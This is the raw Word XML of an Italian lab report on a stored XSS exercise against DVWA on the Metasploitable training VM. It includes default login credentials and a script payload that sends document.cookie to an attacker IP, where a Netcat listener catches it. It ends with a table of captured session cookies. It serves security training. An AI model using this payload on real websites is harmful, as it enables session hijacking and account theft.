      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nella sezione DVWA della macchina Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F6CAFC" w14:textId="411363DB" w:rsidR="004128B4" w:rsidRPr="00E02A28" w:rsidRDefault="004128B4" w:rsidP="004128B4">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verrà visualizzata inizialmente la pagina di login di DVWA, dove entreremo per la prima volta con le credenziali standard “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA924A" w14:textId="29E0D0D0" w:rsidR="004128B4" w:rsidRPr="00E02A28" w:rsidRDefault="004128B4" w:rsidP="004128B4">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Una volta entrati,</w:t>
      </w:r>
      <w:r w:rsidR="00385561" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bisognerà entrare nella tab DVWA Security e settare il livello di sicurezza a “low”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B7758F" w14:textId="09D7EAB6" w:rsidR="00385561" w:rsidRDefault="00385561" w:rsidP="004128B4">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dopodiché, </w:t>
      </w:r>
      <w:r w:rsidR="004B4A98" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">entrando sulla tab dell’XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B4A98" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B4A98" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, si potrà procedere con </w:t>
      </w:r>
      <w:r w:rsidR="00E02A28" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l’invio d</w:t>
      </w:r>
      <w:r w:rsidR="005F0F56">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">el comando sopra </w:t>
      </w:r>
      <w:r w:rsidR="005F0F56" w:rsidRPr="005F0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="005F0F56" w:rsidRPr="005F0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“&lt;script&gt;new Image().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F0F56" w:rsidRPr="005F0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F0F56" w:rsidRPr="005F0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="http://192.168.50.100/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F0F56" w:rsidRPr="005F0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ila.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F0F56" w:rsidRPr="005F0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?"+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F0F56" w:rsidRPr="005F0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F0F56" w:rsidRPr="005F0F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; &lt;/script&gt;”</w:t>
      </w:r>
      <w:r w:rsidR="005F0F56">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000421E1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B540EA0" w14:textId="426C5FEE" w:rsidR="000421E1" w:rsidRDefault="000421E1" w:rsidP="004128B4">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Avendo la porta 80 in ascolto con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00115328">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>si otterrà da terminale il risultato dei cookie di sessione (in questo caso per l’utente admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29171E6F" w14:textId="756121D2" w:rsidR="001310C3" w:rsidRDefault="001310C3" w:rsidP="00115328">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Questi passaggi dovranno essere ripetuti per tutti gli utenti di DVWA (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gordonb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smithy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 1337, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pablo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B6934" w14:textId="306EAFBE" w:rsidR="001310C3" w:rsidRDefault="001310C3" w:rsidP="001310C3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rieseguendo il login per ognuno di questi;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2158D6E1" w14:textId="141B5158" w:rsidR="001310C3" w:rsidRDefault="001310C3" w:rsidP="001310C3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Entrando nella sezione XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C680B" w14:textId="05D8A44B" w:rsidR="001310C3" w:rsidRDefault="001310C3" w:rsidP="001310C3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mettendo in ascolto porta 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6323731D" w14:textId="187F19A0" w:rsidR="001310C3" w:rsidRDefault="001310C3" w:rsidP="001310C3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ricaricando la pagina XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F06CA8B" w14:textId="60389466" w:rsidR="001310C3" w:rsidRDefault="001310C3" w:rsidP="001310C3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Così potremmo ottenere il nuovo cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A1F6ED" w14:textId="659949C4" w:rsidR="001310C3" w:rsidRDefault="00232873" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Di seguito vengono riportate le evidenze dei cookie di sessione rilevati per ogni utente</w:t>
      </w:r>
      <w:r w:rsidR="003878BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C977E83" w14:textId="77777777" w:rsidR="00F912F9" w:rsidRDefault="00F912F9" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AFDD96" w14:textId="391A9A20" w:rsidR="003878BF" w:rsidRDefault="00DC2DDA" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie di sessione: </w:t>
      </w:r>
      <w:r w:rsidR="003878BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB69C1" w14:textId="34861DD9" w:rsidR="003878BF" w:rsidRDefault="003878BF" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1833D8FD" wp14:editId="18288594">
            <wp:extent cx="5006774" cy="1729890"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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006774" cy="1729890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6448D567" w14:textId="77777777" w:rsidR="00F912F9" w:rsidRDefault="00F912F9" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CB8A55" w14:textId="77777777" w:rsidR="00F912F9" w:rsidRDefault="00F912F9" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF4DB68" w14:textId="77777777" w:rsidR="00F912F9" w:rsidRDefault="00F912F9" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5912A654" w14:textId="3229E848" w:rsidR="00232873" w:rsidRDefault="00F912F9" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidR="00DC2DDA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">di sessione: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F8786A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Smithy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AA0CE26" w14:textId="20426BCC" w:rsidR="00F02F59" w:rsidRDefault="00F912F9" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CB4FA12" wp14:editId="4898A912">
            <wp:simplePos x="720436" y="6954982"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4918075" cy="1683385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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918075" cy="1683385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F8786A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="401BB6DC" w14:textId="316F6C77" w:rsidR="00F8786A" w:rsidRDefault="00DC2DDA" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie di sessione: </w:t>
      </w:r>
      <w:r w:rsidR="00F8786A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pablo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267FDCA3" w14:textId="20F538FF" w:rsidR="00F8786A" w:rsidRPr="001310C3" w:rsidRDefault="00506E38" w:rsidP="001310C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00506E38">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E1056E" wp14:editId="3B9A13C5">
            <wp:extent cx="5006774" cy="1684166"/>
            <wp:effectExtent l="0" t="0" r="381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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5006774" cy="1684166"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3ED69" w14:textId="4AB95A6B" w:rsidR="003A270E" w:rsidRPr="00991B51" w:rsidRDefault="00DC2DDA" w:rsidP="00DC2DDA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991B51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie di sessione: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00991B51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gordonb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E5BD9C8" w14:textId="3D2A16DE" w:rsidR="00DC2DDA" w:rsidRDefault="00DC2DDA" w:rsidP="00DC2DDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34B77C21" wp14:editId="4D151742">
            <wp:extent cx="5105842" cy="1767993"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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105842" cy="1767993"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC1EF7" w14:textId="7405573D" w:rsidR="00DC2DDA" w:rsidRPr="00991B51" w:rsidRDefault="00DC2DDA" w:rsidP="00DC2DDA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991B51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cookie di sessione:1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744CF1AD" w14:textId="65165F20" w:rsidR="00DC2DDA" w:rsidRDefault="00DC2DDA" w:rsidP="00DC2DDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52386BEC" wp14:editId="753D02D2">
            <wp:extent cx="5052498" cy="1729890"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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052498" cy="1729890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E51E89C" w14:textId="1FC898AB" w:rsidR="00355934" w:rsidRDefault="00355934" w:rsidP="00DC2DDA"/>
    <w:p w14:paraId="6D959602" w14:textId="50164725" w:rsidR="000F4C7D" w:rsidRPr="00E55284" w:rsidRDefault="000F4C7D" w:rsidP="00DC2DDA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E55284">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nella tabella sono riportati espressamente i cookie di sessione per ogni utente di DVWA:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4704"/>
        <w:gridCol w:w="4924"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B950B5" w14:paraId="7B0F23E9" w14:textId="77777777" w:rsidTr="00B950B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4B9D21E5" w14:textId="60562EB2" w:rsidR="00B950B5" w:rsidRDefault="00B950B5" w:rsidP="00DC2DDA">
            <w:r w:rsidRPr="00B950B5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="662A2D0C" w14:textId="5A39F672" w:rsidR="00B950B5" w:rsidRDefault="00B950B5" w:rsidP="00DC2DDA">
            <w:r w:rsidRPr="00B950B5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="00B950B5">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B950B5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>di</w:t>
            </w:r>
            <w:r w:rsidRPr="00B950B5">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B950B5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sessione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B950B5" w14:paraId="7FF292F3" w14:textId="77777777" w:rsidTr="00B950B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0EE199D5" w14:textId="2A676135" w:rsidR="00B950B5" w:rsidRPr="00B950B5" w:rsidRDefault="00B950B5" w:rsidP="00DC2DDA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7FD74157" w14:textId="434ADFC2" w:rsidR="00B950B5" w:rsidRDefault="00F33248" w:rsidP="00DC2DDA">
            <w:r w:rsidRPr="00F33248">
              <w:t>PHPSESSID=28eb4407bb82132df1f4e034b63a0115</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
